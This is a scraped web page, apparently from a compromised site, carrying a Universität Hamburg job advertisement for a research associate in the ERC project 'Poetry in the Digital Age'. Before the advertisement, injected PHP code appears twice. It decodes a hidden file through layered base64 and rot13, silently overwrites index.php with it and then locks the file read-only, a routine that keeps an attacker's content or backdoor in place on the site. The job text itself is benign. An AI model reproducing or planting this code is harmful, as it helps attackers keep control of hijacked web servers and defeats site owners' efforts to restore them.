$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } $i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Job | 0,5 Wiss. Mitarb. (m/w/d) im Forschungsprojekt „Poetry in the Digital Age“ – Auditive Medienkulturen

Job | 0,5 Wiss. Mitarb. (m/w/d) im Forschungsprojekt „Poetry in the Digital Age“

Arbeitgeber: Universität Hamburg
Arbeitstelle: Fakultät für Geisteswissenschaften, Institut für Germanistik
Ort: Hamburg
Vom – Bis: vom 01.10.2022, befristet bis 30.09.2025
Bewerbungsschluss: 16.06.2022

Im Forschungsprojekt „Poetry in the Digital Age“, gefördert durch den europäischen Forschungsrat (ERC), sind zu Oktober 2022 drei Stellen für Wissenschaftliche Mitarbeiter:innen zu besetzen.

Das interdisziplinäre Projekt wird von Prof. Dr. Claudia Benthien geleitet und an der Universität Hamburg durchgeführt.

Für ein Teilprojekt, das sich mit Gegenwartslyrik und Musik befasst, suchen wir eine:n Nachwuchswissenschaftler:in mit musikwissenschaftlicher Expertise. Das Teilprojekt untersucht die Auswirkungen der Digitalisierung auf musikalische Formen von Lyrik. Unter anderem widmet es sich Lyriker:innen, die mit Musiker:innen oder Klangkünstler:innen zusammenarbeiten, ihre Stimmen mit Loop-Pads manipulieren, synthetische Stimmen in ihren Darbietungen verwenden oder Audioaufnahmen mit Sounds oder elektronischen Beats versehen. Ferner werden Rhythmus und Melodie in der Lyrik in Bezug zu musikalischen Strukturen betrachtet, beispielweise im Rap.

Für die aktuell ausgeschriebene Stelle als Wissenschaftliche:r Mitarbeiter:in werden insbesondere Projektvorschläge berücksichtigt, die musikalisch begleitete oder vertonte Lyrik in Form von Live-Aufführungen, Audioaufnahmen und/oder Poetry Clips untersuchen. Die musikalischen Genres können sich von Kunstmusik über experimentelle Musik bis hin zu Popmusik erstrecken.

Aufgabengebiet und Einstellungsvoraussetzungen

Die Stelle beinhaltet:

Die Aufgaben umfassen wissenschaftliche Dienstleistungen vorrangig in der Forschung. Außerhalb der Dienstaufgaben besteht Gelegenheit zur wissenschaftlichen Weiterbildung.

Wissenschaftliche Mitarbeit im interdisziplinären Projekt „Poetry in the Digital Age“, das durch den Europäischen Forschungsrat (ERC) gefördert und von Prof. Dr. Claudia Benthien geleitet wird (siehe www.poetry-digital-age.uni-hamburg.de). Angesiedelt ist die Stelle im Teilprojekt 2 „Music(alization) and the Lyric: Recent Medial Correlations“. Die Stelle beinhaltet keine Lehrverpflichtung.

Das Teilprojekt 2 untersucht die Auswirkungen der Digitalisierung auf musikalische Formen von Lyrik. Unter anderem widmet es sich Lyrikerinnen bzw. Lyrikern, die mit Musikerinnen bzw. Musikern oder Klangkünstlerinnen bzw. Klangkünstler zusammenarbeiten, ihre Stimmen mit Loop-Pads manipulieren, synthetische Stimmen in ihren Darbietungen verwenden oder Audioaufnahmen mit Sounds oder elektronischen Beats versehen. Ferner werden Rhythmus und Melodie in der Lyrik in Bezug zu musikalischen Strukturen betrachtet, beispielweise im Rap.

Für die Stelle als Wissenschaftliche Mitarbeiterin bzw. Wissenschaftlicher Mitarbeiter werden insbesondere Projektvorschläge berücksichtigt, die musikalisch begleitete oder vertonte Lyrik in Form von Live-Aufführungen, Audioaufnahmen und/oder Poetry Clips untersuchen. Die musikalischen Genres können sich von Kunstmusik über experimentelle Musik bis hin zu Popmusik erstrecken.

Zu den Aufgaben zählen außerdem die Teilnahme an den Forschungskolloquien, Vortragsreihen und Workshops des ERC-Projekts sowie eine aktive Mitwirkung an den kollaborativen Forschungstätigkeiten und Publikationen.

Erforderlich ist:

Abschluss eines den Aufgaben entsprechenden Hochschulstudiums.

Erwünscht sind:

Gewünscht wird ein Masterabschluss (oder ein äquivalenter Abschluss) im Bereich Literaturwissenschaft oder Musikwissenschaft. Kenntnisse in akademischem Deutsch und Englisch sind erforderlich. Sie sollten überdies eine Affinität zur zeitgenössischen Kultur sowie zum Themenfeld Lyrik und Medien mitbringen.


Weitere Informationen (auf Deutsch und Englisch):

https://www.uni-hamburg.de/stellenangebote/ausschreibung.html?jobID=8f5c4e25ade50484c1c156605440b378813e999c

https://www.uni-hamburg.de/en/stellenangebote/ausschreibung.html?jobID=caa5a938cd4eb3d9c5cbf23eb5c019eb7ac64086